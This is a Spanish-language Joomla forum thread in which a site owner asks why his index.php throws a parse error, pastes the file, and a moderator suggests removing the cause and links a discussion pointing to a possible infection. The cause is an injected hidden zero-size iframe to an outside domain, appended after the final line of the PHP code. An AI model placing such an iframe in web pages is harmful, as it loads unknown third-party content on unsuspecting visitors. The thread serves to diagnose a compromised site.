Bienvenido, Invitado
Nombre de Usuario: Contraseña:

TEMA: quien me ayuda con este error

quien me ayuda con este error 5 años 10 meses antes #3872

  • Borismiranda
  • Avatar de Borismiranda
  • Fuera de línea
  • Senior Boarder
  • Mensajes: 44
  • Gracias recibidas 1
  • Karma: 3
Hola comunidad Joomleros, primero que todo ME PERDI EL JOOMLA DAY, por mas que trate de no tener compromisos ese dia, me lo perdí.
me ocurrio algo curioso hace 2 dias entre a mi sitio y decia esto "Parse error: syntax error, unexpected '<' in /home/cm000445/public_html/index.php on line 88"
en este sitio, www.borismiranda.com, pero no fue afectado por completo, ya que tengo otros sitios en otras carpetas en el mismo hosting y no les ocurrio nada, solo mi sitio, uno de prueba que es de una empresa "usher" que entregue hace menos de 1 mes y que tambien tiene el mismo error ahora en su hosting final que es www.usher.cl.

entre al index.php con Dreamweaver y encontro un error que la paginas estaba en html y no en php con un contenido extraño en la linea 88, una direccion de un sitio que nunca puse, aqui esta el codigo:

<?php
/**
* @version $Id: index.php 14401 2010-01-26 14:10:00Z louis $
* @package Joomla
* @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

// Set flag that this is a parent file
define( '_JEXEC', 1 );

define('JPATH_BASE', dirname(__FILE__) );

define( 'DS', DIRECTORY_SEPARATOR );

require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );

JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;

/**
* CREATE THE APPLICATION
*
* NOTE :
*/
$mainframe =& JFactory::getApplication('site');

/**
* INITIALISE THE APPLICATION
*
* NOTE :
*/
// set the language
$mainframe->initialise();

JPluginHelper::importPlugin('system');

// trigger the onAfterInitialise events
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
$mainframe->triggerEvent('onAfterInitialise');

/**
* ROUTE THE APPLICATION
*
* NOTE :
*/
$mainframe->route();

// authorization
$Itemid = JRequest::getInt( 'Itemid');
$mainframe->authorize($Itemid);

// trigger the onAfterRoute events
JDEBUG ? $_PROFILER->mark('afterRoute') : null;
$mainframe->triggerEvent('onAfterRoute');

/**
* DISPATCH THE APPLICATION
*
* NOTE :
*/
$option = JRequest::getCmd('option');
$mainframe->dispatch($option);

// trigger the onAfterDispatch events
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
$mainframe->triggerEvent('onAfterDispatch');

/**
* RENDER THE APPLICATION
*
* NOTE :
*/
$mainframe->render();

// trigger the onAfterRender events
JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');

/**
* RETURN THE RESPONSE
*/
echo JResponse::toString($mainframe->getCfg('gzip'));<html><body><iframe src="planeteverde.com/" width="0" height="0" frameborder="0"></iframe></body></html>

la ultima linea a partir de "echo" es la linea 88

¿alguien sabe de que se trata?
El administrador ha desactivado la escritura pública.

Re: quien me ayuda con este error 5 años 10 meses antes #3873

  • danylocl
  • Avatar de danylocl
  • Fuera de línea
  • Moderator
  • Mensajes: 86
  • Karma: 5
Hola,

Que pena que te hayas perdido el Joomla! Day Chile, de todas formas puedes revisar los vídeos del evento en www.joomladay-chile.cl/difusion/cobertura-en-el-www.html

Respecto a tu problema, prueba a borrar la ultima parte del código en concreto:

<html><body><iframe src="planeteverde.com/" width="0" height="0" frameborder="0"></iframe></body></html>

y ahí nos cuentas como te fue, saludos.
Daniel Martinez
Moderador
Comunidad Joomla Chile
El administrador ha desactivado la escritura pública.




Re: quien me ayuda con este error 5 años 10 meses antes #3906

  • Borismiranda
  • Avatar de Borismiranda
  • Fuera de línea
  • Senior Boarder
  • Mensajes: 44
  • Gracias recibidas 1
  • Karma: 3
si, master ya hice ese cambio porque encontre logico que ese fragmento de html no deberia estar ahi, pero me da otro error:

Parse error: syntax error, unexpected '<' in /home/mi000302/public_html/cms/joomla/sitio1/index.php on line 88

la verdad no comprendo bien, estoy pensando en sobreescribir la instalacion, ¿pero que podria pasar?
El administrador ha desactivado la escritura pública.




Re: quien me ayuda con este error 5 años 10 meses antes #3907

  • danylocl
  • Avatar de danylocl
  • Fuera de línea
  • Moderator
  • Mensajes: 86
  • Karma: 5
Ahí hablan sobre el asunto forum.joomla.org/viewtopic.php?t=403117, parece que puede ser un virus o algo así (por eso lo del iframe con esa dirección) o también el cambio de la versión de php.

Tenia mucha información la pagina? podrías probar a ver si puedes hacer una copia e instalarla en local.

Saludos.
Daniel Martinez
Moderador
Comunidad Joomla Chile
El administrador ha desactivado la escritura pública.

Re: quien me ayuda con este error 5 años 10 meses antes #3908

  • Borismiranda
  • Avatar de Borismiranda
  • Fuera de línea
  • Senior Boarder
  • Mensajes: 44
  • Gracias recibidas 1
  • Karma: 3
vale hare una migracion y les cuento
El administrador ha desactivado la escritura pública.
Tiempo de carga de la página: 0.279 segundos
Gracias a Foro Kunena